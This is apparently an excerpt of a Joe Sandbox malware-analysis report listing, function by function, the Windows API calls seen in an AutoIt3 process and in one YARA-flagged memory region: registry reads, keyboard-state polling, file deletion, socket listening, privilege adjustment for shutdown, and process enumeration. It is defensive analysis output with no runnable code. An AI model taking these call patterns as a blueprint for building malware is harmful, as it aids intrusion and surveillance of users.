                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880B0C
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00880BAB
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00880C43
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00880E82
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880E8F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: a2840452da932c6dc31c3cf79c04025ae2753014042afa32fef564b0bc17b044
                                      • Instruction ID: 01a43a45fc158f4b4c6333cd93744726790dd7e1bae711aa0eccd3be3efd66c1
                                      • Opcode Fuzzy Hash: a2840452da932c6dc31c3cf79c04025ae2753014042afa32fef564b0bc17b044
                                      • Instruction Fuzzy Hash: 42E15E71204214AFCB54EF28C895E2BBBE9FF89714F04895DF949D72A1DA30E905CF52
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00860530
                                      • GetAsyncKeyState.USER32(000000A0), ref: 008605B1
                                      • GetKeyState.USER32(000000A0), ref: 008605CC
                                      • GetAsyncKeyState.USER32(000000A1), ref: 008605E6
                                      • GetKeyState.USER32(000000A1), ref: 008605FB
                                      • GetAsyncKeyState.USER32(00000011), ref: 00860613
                                      • GetKeyState.USER32(00000011), ref: 00860625
                                      • GetAsyncKeyState.USER32(00000012), ref: 0086063D
                                      • GetKeyState.USER32(00000012), ref: 0086064F
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860667
                                      • GetKeyState.USER32(0000005B), ref: 00860679
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: ddd547c40d700566e469c3b69f97a74704681796631378dfefef4638f03184d1
                                      • Instruction ID: 880a0f9fcf1a3548920549892c0655a3ca1f9695d52b546ea435a1fc191563ab
                                      • Opcode Fuzzy Hash: ddd547c40d700566e469c3b69f97a74704681796631378dfefef4638f03184d1
                                      • Instruction Fuzzy Hash: 8641EA305047CA5DFF319764C8083B7BEA0FB61304F09415AD6C6D62C2EB9499D4CFAA
                                      APIs
                                      • __swprintf.LIBCMT ref: 00864451
                                      • __swprintf.LIBCMT ref: 0086445E
                                        • Part of subcall function 008238C8: __woutput_l.LIBCMT ref: 00823921
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00864488
                                      • LoadResource.KERNEL32(?,00000000), ref: 00864494
                                      • LockResource.KERNEL32(00000000), ref: 008644A1
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 008644C1
                                      • LoadResource.KERNEL32(?,00000000), ref: 008644D3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 008644E2
                                      • LockResource.KERNEL32(?), ref: 008644EE
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0086454F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: 6fd7a7b72a081b1598fab081269fcc0c429479037085de00e6fc849d5f400c4d
                                      • Instruction ID: 5f613b89cb2cee6e89cb819790962c15738379c6b6dabb1012e0c6aa98cb04b8
                                      • Opcode Fuzzy Hash: 6fd7a7b72a081b1598fab081269fcc0c429479037085de00e6fc849d5f400c4d
                                      • Instruction Fuzzy Hash: 69318D7160121AAFDB12AFA0EC59EBF7BB9FF04301F054426F916D6150EB74DA21CBA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 640bcfa14b22063de205e8767e8deccfbb16885a21f6307a4f3a680e52922b4d
                                      • Instruction ID: feec844be483af9a111a1b0d7e0fe56ba380ee0aa376e87e9d6e91e3b36ddc15
                                      • Opcode Fuzzy Hash: 640bcfa14b22063de205e8767e8deccfbb16885a21f6307a4f3a680e52922b4d
                                      • Instruction Fuzzy Hash: C62171312452159FDB12AF64EC49B2E7BA8FF54721F04C016FA0ADB2A1DB70ED008F56
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00863D96
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00863E3E
                                      • MoveFileW.KERNEL32(?,?), ref: 00863E51
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00863E6E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00863E90
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00863EAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: 929fa54b37b4d34d4e4704068cabb5e054ff04349b046ed9eb08556e4bccac74
                                      • Instruction ID: 8efae59b048e459bdd0ad0f17aa96d8ae29ddc2f837b56b99b77402d83accc69
                                      • Opcode Fuzzy Hash: 929fa54b37b4d34d4e4704068cabb5e054ff04349b046ed9eb08556e4bccac74
                                      • Instruction Fuzzy Hash: F8518A3180110DAACF15EBA4CA969EDB779FF10300F600169E502F6192EB316F49CBA2
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0086FA83
                                      • FindClose.KERNEL32(00000000), ref: 0086FB96
                                        • Part of subcall function 008052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • Sleep.KERNEL32(0000000A), ref: 0086FAB3
                                      • _wcscmp.LIBCMT ref: 0086FAC7
                                      • _wcscmp.LIBCMT ref: 0086FAE2
                                      • FindNextFileW.KERNEL32(?,?), ref: 0086FB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 2185952417-438819550
                                      • Opcode ID: 008b70dc71c586999b7ee841be808b6bb677d29fd7e4362e5235e7a9fd06df81
                                      • Instruction ID: 28c5ad0657406714a35594a7092a3e00c0f0c0857a8c1f5e22111e1f7301aa15
                                      • Opcode Fuzzy Hash: 008b70dc71c586999b7ee841be808b6bb677d29fd7e4362e5235e7a9fd06df81
                                      • Instruction Fuzzy Hash: 4141707190021AAFDF14DFA4DC59AEEBBB8FF05351F144166E914E2291EB30DA84CF91
                                      APIs
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086407C
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008640CC
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008640DD
                                      • FindClose.KERNEL32(00000000), ref: 008640F4
                                      • FindClose.KERNEL32(00000000), ref: 008640FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: 5ffd9aaa64d0951db8c3f7dd619b13c04c10efb9904e3599af9f7e10339993a2
                                      • Instruction ID: 85e61887e703863aa0b0c3d393738cf12e6a7ab11cd6e4ddff5560f243701ffb
                                      • Opcode Fuzzy Hash: 5ffd9aaa64d0951db8c3f7dd619b13c04c10efb9904e3599af9f7e10339993a2
                                      • Instruction Fuzzy Hash: 7B317E310083559FC641EB64D8958EFB7ECFE95304F440A2EF5E1C2192DB209A49CBA3
                                      APIs
                                        • Part of subcall function 00859399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                        • Part of subcall function 00859399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                        • Part of subcall function 00859399: GetLastError.KERNEL32 ref: 0085941D
                                      • ExitWindowsEx.USER32(?,00000000), ref: 008657B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: e010e19bfe285f7db44c9f3c91ac11c020047ae43ba1e62e88917c2d00c60419
                                      • Instruction ID: 555c60ffbe445fc0ce4d12c507f70312e8fbba676e3fb0428478674e16ab4d8c
                                      • Opcode Fuzzy Hash: e010e19bfe285f7db44c9f3c91ac11c020047ae43ba1e62e88917c2d00c60419
                                      • Instruction Fuzzy Hash: DD014931750716EFE72867A8EC8BFBB729CFB04745F26012AFC63E21D2EA505C008564
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008769C7
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008769D6
                                      • bind.WSOCK32(00000000,?,00000010), ref: 008769F2
                                      • listen.WSOCK32(00000000,00000005), ref: 00876A01
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876A1B
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00876A2F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 7569041b2082b9404a99e8bca853f8c8554e3d3c0b09d1b3cf4f2466171aae2f
                                      • Instruction ID: de1d7d3f9b254753ac905cda153982a7067c50301112c1839c2bd662e9d794ad
                                      • Opcode Fuzzy Hash: 7569041b2082b9404a99e8bca853f8c8554e3d3c0b09d1b3cf4f2466171aae2f
                                      • Instruction Fuzzy Hash: 8521BB71200A15AFCB00EF68CC89A6EB7B9FF44720F148159E91AE73D1DB70EC018B92
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C329
                                      • _wcscmp.LIBCMT ref: 0086C359
                                      • _wcscmp.LIBCMT ref: 0086C36E
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086C37F
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0086C3AF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                      • String ID:
                                      • API String ID: 2387731787-0
                                      • Opcode ID: 114c4cec616e51e307e927c4be312040e57808d9fd9744991bad609b76bb1bf3
                                      • Instruction ID: 4fd821abbd9eb54f9998f6a6607f12fc84176944b3f7cf5d27c45926c4890b37
                                      • Opcode Fuzzy Hash: 114c4cec616e51e307e927c4be312040e57808d9fd9744991bad609b76bb1bf3
                                      • Instruction Fuzzy Hash: 7A51AB756046028FD714DF68D490EAAB3E8FF49314F11861EE99AC73A1DB30ED04CB92
                                      APIs
                                        • Part of subcall function 00878475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00876E89
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876EB2
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00876EEB
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876EF8
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00876F0C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 21f5b09f2baddf8ecaf28e80a1d9d17c8e27416b905ee6a65863e522ad106e0c
                                      • Instruction ID: a04cd021b157ba874e952ff7f4861089c8367dc057cc4297df2573fccb5eee28
                                      • Opcode Fuzzy Hash: 21f5b09f2baddf8ecaf28e80a1d9d17c8e27416b905ee6a65863e522ad106e0c
                                      • Instruction Fuzzy Hash: 2541B4B5740614AFDB50AF689C87F7E73A8FB44714F048458FA09EB3D2DA709D008BA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 9ddea336d49914fda23bf73f18eede0eec570177aa4301011795987887a5f2b7
                                      • Instruction ID: 258dd149c062b7b941c6fa1d7c33526778c3ed9b75bdfcb64caab871a09f26b4
                                      • Opcode Fuzzy Hash: 9ddea336d49914fda23bf73f18eede0eec570177aa4301011795987887a5f2b7
                                      • Instruction Fuzzy Hash: EE11C472340A229FE7217F6A9C84A2E7B99FF44761B05412AF846D7241DB30DD018BA1
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0086CA75
                                      • CoCreateInstance.OLE32(00893D3C,00000000,00000001,00893BAC,?), ref: 0086CA8D
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • CoUninitialize.OLE32 ref: 0086CCFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: fb6686dc451b74f3bf788428ca3ac3881be38439ea09b32c2cf39864c077e488
                                      • Instruction ID: bad6923ac109abd058d918b24124581d9ff798456c907c1bb0a63397ba402ffa
                                      • Opcode Fuzzy Hash: fb6686dc451b74f3bf788428ca3ac3881be38439ea09b32c2cf39864c077e488
                                      • Instruction Fuzzy Hash: 4AA129B1244205AFD700EF68DC81EABB7ACFF94754F004918F655D7292EB70AA49CB92
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0084027A,?), ref: 0087C6E7
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087C6F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 14ffc15b8d7606a3594de0614ce455890dc6112914ee03b033e3a10da9ef0779
                                      • Instruction ID: d75c8952bc5610a9c21374015e0816286111e64235a893e65f941e815238d5c9
                                      • Opcode Fuzzy Hash: 14ffc15b8d7606a3594de0614ce455890dc6112914ee03b033e3a10da9ef0779
                                      • Instruction Fuzzy Hash: E0E0C2785003028FD7206B6DCC49A5276D4FF04384B44C42EE8B9C3310EBB4C8808F10
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: a00f9d61d495d57f82e2f8ff0e74930a0c8eea6fd079e081e3ac1ebc528f5bfc
                                      • Instruction ID: bf484b4e899b2244fdf2b77df43c2b29a35d3444db990f84cc3d133f13f78287
                                      • Opcode Fuzzy Hash: a00f9d61d495d57f82e2f8ff0e74930a0c8eea6fd079e081e3ac1ebc528f5bfc
                                      • Instruction Fuzzy Hash: 46D0127281851CEAC7089B90CC55DFB737CFB04308F140452F646E2040D2399788AE22
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0086416D
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0086419B
                                      • CloseHandle.KERNEL32(00000000), ref: 00864245
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 621946f8e2560560840e2ecf66b32dcc8237404e3901ee8067272bf13edac3cc
                                      • Instruction ID: 0ff4cb9c7fb92bb2f37816e5c9b0db27561a12179ab235ecb3c84e3a925244f7
                                      • Opcode Fuzzy Hash: 621946f8e2560560840e2ecf66b32dcc8237404e3901ee8067272bf13edac3cc
                                      • Instruction Fuzzy Hash: F831A0711083419FD700EF54D895AAFBBE8FF95350F14092EF685C22A1EB709A89CB93
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F39F
                                      • FindNextFileW.KERNEL32(?,?,00000000,03D1F706,?,00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F6DC
                                      • FindClose.KERNEL32(?,03D1F70D,03D1F706,?,00000000,?,00000000,03D1F868,?,?,?,?,0000005D,00000000,00000000), ref: 03D1F700
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 8d8cbbb34418b403adcf66e97b2f9cc6aa0ab2b0715d402326ac07a536817641
                                      • Instruction ID: 81005435185cfb775ab9d6984e34854e01032089a998d396dbf06680d4871055
                                      • Opcode Fuzzy Hash: 8d8cbbb34418b403adcf66e97b2f9cc6aa0ab2b0715d402326ac07a536817641
